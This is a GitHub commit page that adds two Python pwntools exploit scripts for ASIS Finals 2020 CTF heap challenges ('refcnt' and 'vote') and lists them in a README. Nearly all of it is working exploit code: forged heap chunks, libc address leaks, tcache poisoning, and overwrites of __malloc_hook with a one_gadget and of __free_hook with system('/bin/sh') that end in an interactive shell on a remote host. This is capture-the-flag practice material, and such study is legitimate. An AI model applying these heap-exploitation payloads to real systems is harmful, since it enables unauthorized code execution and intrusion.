Skip to content

Commit ce2a2ac

Browse files
committed
Upload ASIS finals 2020
1 parent 5b02fe0 commit ce2a2ac

File tree

5 files changed

+195
-0
lines changed

5 files changed

+195
-0
lines changed

ASIS_2020/refcnt/chall

13.1 KB
Binary file not shown.

ASIS_2020/refcnt/libc.so.6

1.94 MB
Binary file not shown.

ASIS_2020/refcnt/xpl.py

+109
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,109 @@
1+
#!/usr/bin/env python3
2+
from pwn import *
3+
4+
context.terminal = ["tmux", "sp", "-h"]
5+
#context.log_level = "debug"
6+
7+
chall = ELF("./chall", checksec=False)
8+
libc = ELF("./libc.so.6", checksec=False)
9+
10+
def alloc(idx, size):
11+
io.sendlineafter("Choice:", "1")
12+
io.sendlineafter("Index:", str(idx))
13+
io.sendlineafter("Size:", str(size))
14+
15+
def edit(idx, data):
16+
io.sendlineafter("Choice:", "2")
17+
io.sendlineafter("Index:", str(idx))
18+
io.sendafter("Data:", data)
19+
20+
def show(idx):
21+
io.sendlineafter("Choice:", "4")
22+
io.sendlineafter("Index:", str(idx))
23+
24+
def copy(frm, to):
25+
io.sendlineafter("Choice:", "3")
26+
io.sendlineafter("From:", str(frm))
27+
io.sendlineafter("To:", str(to))
28+
29+
def delete(idx):
30+
io.sendlineafter("Choice:", "5")
31+
io.sendlineafter("Index:", str(idx))
32+
33+
io = remote("69.90.132.248", 1337)
34+
35+
alloc(0, 0x90)
36+
37+
copy(0, 0)
38+
edit(0, "A" * 8)
39+
copy(0, 0)
40+
41+
alloc(1, 0x90)
42+
alloc(2, 0x90)
43+
44+
copy(2, 3)
45+
edit(1, p8(0) * 0x0 + p64(0x51))
46+
47+
alloc(0, 0x40)
48+
alloc(4, 0x40)
49+
50+
edit(2, p8(0) * 0x8f + p8(0xf1))
51+
alloc(0, 0xe0)
52+
53+
fake_chunk = p64(0) + p64(0xf1)
54+
fake_chunk += p64(0x1) + p64(0)
55+
56+
for _ in range(7):
57+
edit(0, p8(0) * 0x38 + fake_chunk)
58+
copy(4, 4)
59+
60+
alloc(1, 0xf0) # Fix next chunk
61+
edit(1, p8(0) * 0x90 + p64(0x61))
62+
63+
edit(0, p8(0) * 0x38 + fake_chunk)
64+
copy(4, 4)
65+
66+
edit(0, "A" * 0x48)
67+
show(0)
68+
69+
io.recvuntil("A" * 0x48)
70+
leaked_libc = u64(io.recvuntil("\n", drop = True).ljust(8, b"\x00"))
71+
libc.address = leaked_libc - 0x1ebbe1
72+
73+
log.success("Leaked GLIBC address: " + hex(leaked_libc))
74+
log.info("GLIBC base address: " + hex(libc.address))
75+
76+
fake_chunk = p64(0) + p64(0x51)
77+
fake_chunk += p64(0x1) + p64(0)
78+
79+
edit(0, p8(0) * 0x38 + fake_chunk)
80+
copy(4, 4)
81+
82+
fake_chunk = p64(0) + p64(0x51)
83+
fake_chunk += p64(0x1) + p64(0)
84+
85+
edit(0, p8(0) * 0x38 + fake_chunk)
86+
copy(4, 4)
87+
88+
fake_chunk = p64(0) + p64(0x51)
89+
fake_chunk += p64(libc.sym["__malloc_hook"] - 0x8) + p64(0)
90+
91+
edit(0, p8(0) * 0x38 + fake_chunk)
92+
copy(4, 4)
93+
94+
alloc(1, 0x40)
95+
96+
fake_chunk = p64(0) + p64(0x51)
97+
fake_chunk += p64(0x2) + p64(0)
98+
99+
edit(0, p8(0) * 0x38 + fake_chunk)
100+
101+
alloc(2, 0x40)
102+
edit(2, p64(libc.address + 0xe6c7e))
103+
104+
alloc(1, 0)
105+
106+
io.interactive()
107+
io.close()
108+
109+

ASIS_2020/vote/xpl.py

+84
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,84 @@
1+
#!/usr/bin/env python3
2+
from pwn import *
3+
4+
context.terminal = ['tmux', 'sp', '-h']
5+
#context.log_level = 'DEBUG'
6+
7+
HOST = "69.90.132.248"
8+
PORT = 3371
9+
10+
elf = ELF("./vote")
11+
LOCAL = True
12+
13+
IDs = []
14+
15+
def create_vote(data, shell = False):
16+
global IDs
17+
io.recvuntil("> ")
18+
io.sendline("5")
19+
io.recvuntil("(y/n)?\n")
20+
io.sendline("A")
21+
io.recvuntil("age?\n")
22+
io.sendline("1")
23+
io.recvuntil("gender?\n")
24+
io.sendline(data)
25+
if not shell:
26+
io.recvuntil("live?\n")
27+
io.sendline("A")
28+
io.recvuntil("vote?\n")
29+
io.sendline("A")
30+
io.recvuntil("ID is ")
31+
IDs.append(io.recvuntil(".\n", drop = True))
32+
33+
def update_vote(id, data):
34+
global IDs
35+
io.recvuntil("> ")
36+
io.sendline("4")
37+
io.recvuntil("ID: ")
38+
io.sendline(IDs[id])
39+
io.recvuntil("gender: ")
40+
dump = io.recvuntil("\nWhat", drop = True)
41+
io.recvuntil("gender?\n")
42+
io.sendline(data)
43+
44+
return dump
45+
46+
def delete_vote(id, pop = False):
47+
global IDs
48+
io.recvuntil("> ")
49+
io.sendline("3")
50+
io.recvuntil("ID: ")
51+
io.sendline(IDs[id])
52+
if pop:
53+
IDs.pop(id)
54+
55+
if LOCAL == True:
56+
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False)
57+
io = process(elf.path, env = {"LD_PRELOAD": libc.path})
58+
else:
59+
libc = ELF("./libc.so.6", checksec = False)
60+
io = remote(HOST, PORT)
61+
62+
for _ in range(8):
63+
create_vote("A" * 0x100)
64+
65+
for i in range(7, 0, -1):
66+
delete_vote(i)
67+
68+
delete_vote(0)
69+
libc_leak = u64(update_vote(0, "")[8:16])
70+
libc.address = libc_leak - 0x1e4ca0 # Remote: not the right offset
71+
72+
log.success("Leaked GLIBC address: " + hex(libc_leak))
73+
log.info("GLIBC base address: " + hex(libc.address))
74+
log.info("__free_hook@@GLIBC: " + hex(libc.sym["__free_hook"]))
75+
log.info("__malloc_hook@@GLIBC: " + hex(libc.sym["__malloc_hook"]))
76+
log.info("system@@GLIBC: " + hex(libc.sym["system"]))
77+
78+
update_vote(1, p64(libc.sym["__free_hook"] - 8))
79+
create_vote("A" * 0x100)
80+
create_vote(b"/bin/sh\x00" + p64(libc.sym["system"]) + p8(0) * 0xf0, shell = True)
81+
82+
io.interactive()
83+
io.close()
84+

README.md

+2
Original file line numberDiff line numberDiff line change
@@ -15,6 +15,8 @@
1515
| Penpal World - Redpwn CTF 2019 | [Penpal World exploit](../master/penpal_world_redpwnCTF2019/exploit.py) |
1616
| one - SECCON 2019 | [one exploit](../master/one_SECCON_2019/exploit.py) |
1717
| Chromatic Aberration - CONFidence 2020 CTF | [chromatic exploit](../master/chromatic_aberration/pwn.js) |
18+
| refcnt - ASIS Finals 2020 CTF | [refcnt exploit](../master/ASIS_2020/refcnt/xpl.py) |
19+
| vote - ASIS Finals 2020 CTF | [vote exploit](../master/ASIS_2020/vote/xpl.py) |
1820

1921
| Vulnerabilities | Exploit |
2022
| --- | --- |

0 commit comments

Comments
 (0)